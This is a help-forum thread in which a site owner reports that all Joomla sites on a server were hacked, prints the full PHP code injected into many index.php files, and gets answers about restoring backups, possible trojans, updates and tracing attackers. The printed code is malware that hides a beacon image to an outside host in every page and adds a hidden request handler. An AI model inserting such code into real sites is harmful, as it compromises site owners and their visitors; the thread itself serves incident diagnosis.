2

Possible Duplicate:
My server's been hacked EMERGENCY

All Joomla! sites hosted on a single server of mine were hacked and had the following code injected into the index.php files throughout many directories.

    <?php
//{{126104ed

GLOBAL $alreadyxxx;
if($alreadyxxx != 1)
{
$alreadyxxx = 1;

$olderrxxx=error_reporting(0);

function outputxxx_callback($str)
{
  $links = '<SPAN STYLE="font-style: normal; visibility: hidden; position: absolute; left: 0px; top: 0px;"><div id="af4dae82ae67843a194c001162"><img width=0 height=0 src="http://airschk.com/countbk.gif?id=4dae82ae67843a194c001162&p=1&a=%91P%BC%BCQ%F7%20%7C6%BE%0A8%F52%9C%F5nT%82%8A%C8V%27%A1%1E%85%1B%16%DBh%F2%A3U%10%9Dh%9C%FF%B6t%0F%B2%E9%18"></div></SPAN>';
  preg_match("|</body>|si",$str,$arr);
  return str_replace($arr[0],$links.$arr[0],$str);
}

function StrToNum($Str, $Check, $Magic)
{
   $Int32Unit = 4294967296;
   $length = strlen($Str);
   for ($i = 0; $i < $length; $i++) {
       $Check *= $Magic;
       if ($Check >= $Int32Unit) {
           $Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
           $Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
       }
       $Check += ord($Str{$i});
   }
   return $Check;
}
function HashURL($String)
{
   $Check1 = StrToNum($String, 0x1505, 0x21);
   $Check2 = StrToNum($String, 0, 0x1003F);

   $Check1 >>= 2;
   $Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
   $Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
   $Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);

   $T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
   $T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );

   return ($T1 | $T2);
}

function CheckHash($Hashnum)
{
   $CheckByte = 0;
   $Flag = 0;

   $HashStr = sprintf('%u', $Hashnum) ;
   $length = strlen($HashStr);

   for ($i = $length-1; $i >= 0;  $i--) {
       $Re = $HashStr{$i};
       if (1 === ($Flag % 2)) {
           $Re += $Re;
           $Re = (int)($Re / 10) + ($Re % 10);
       }
       $CheckByte += $Re;
       $Flag ++;
   }

   $CheckByte %= 10;
   if (0 !== $CheckByte) {
       $CheckByte = 10 - $CheckByte;
       if (1 === ($Flag % 2) ) {
           if (1 === ($CheckByte % 2)) {
               $CheckByte += 9;
           }
           $CheckByte >>= 1;
       }
   }

   return '7'.$CheckByte.$HashStr;
}

function getpr($url)
{
   $ch = CheckHash(HashURL($url));
   $file = "http://toolbarqueries.google.com/search?client=navclient-auto&ch=$ch&features=Rank&q=info:$url";;
   $data = file_get_contents($file);
   $pos = strpos($data, "Rank_");
   if($pos === false){return -1;} else{
       $pr=substr($data, $pos + 9);
       $pr=trim($pr);
       $pr=str_replace("
",'',$pr);
       return $pr;
   }
}

if(isset($_POST['xxxprch']))
{
    echo getpr($_POST['xxxprch']);
    exit();
}
else
  ob_start('outputxxx_callback');

error_reporting($olderrxxx);
}

//}}861921ab

As far I was aware and according to all documentation, my Joomla! sites were secure. However, all of them on the same server were hacked at the same time. Is the hosts fault?

Anyone know where I should begin cleaning this mess up? Any quick solutions apart from my site backups?

And the biggest question I have is what would be the best way to trace the hacker to his/her site, server or location? I really want to show them my appreciation of their work in return.

Community
  • 1
Andy Smith
  • 123

5 Answers5

4

"As far I was aware and according to all documentation, my Joomla! sites were secure."

That statement is your first problem. If you google for "joomla hacked" there are 280,000 results just in the past month alone...

As far as recovery, I wouldn't trust anything shy of restoring from a known good backup. Those edits are just the ones you found. Who knows what else might have been put in there.

For tracking them down, you might want to start by reading this: http://kb.siteground.com/article/Joomla_hacked.html

In a nutshell I'd say your chances are close to nil. However, they go up a few percentage points if you happen to have deep pockets or government backing.

ChrisLively
  • 3,782
2

My guess is that they got the password for your server with a Trojan. Check your computer asap, specially if you store the server passwords in any program (browser, ftp clients, total commander, etc.) Btw: I'm assuming you're using windows

About tracing the hacker, its not going to be easy. First check the access-logs from the time this happened. You'll probably see tons of ftp activity there. Have a look at the IP of those logs. If all of them are different, then he's probably using zombie computers and its very unlikely that you'll get to him. If they're all the same, then you might be a little more lucky.

Anyway, this sounds like an automated attack. Do a search to check if other sites (not in your server) had the same code injected to them.

Cristian
  • 66
1

You don't give us enough details to be able to help with the how, it was almost certainly an automated attack and trying to track it down will just waste your time.

There is no quick way to recover from this. Nuke from orbit and restore from a known good backup is the only way to go.

user9517
  • 117,122
0

Make sure you keep Joomla up to date! Keep on top of security updates and get them installed on all sites they day they are released.

Alex
  • 438
0

There is some explanation about it here:

http://sucuri.net/malware/malware-entry-mwbackdoor23

Which seems to be a backdoor and the img src is just used to notify the attackers that the backdoor is there...

David Dede
  • 1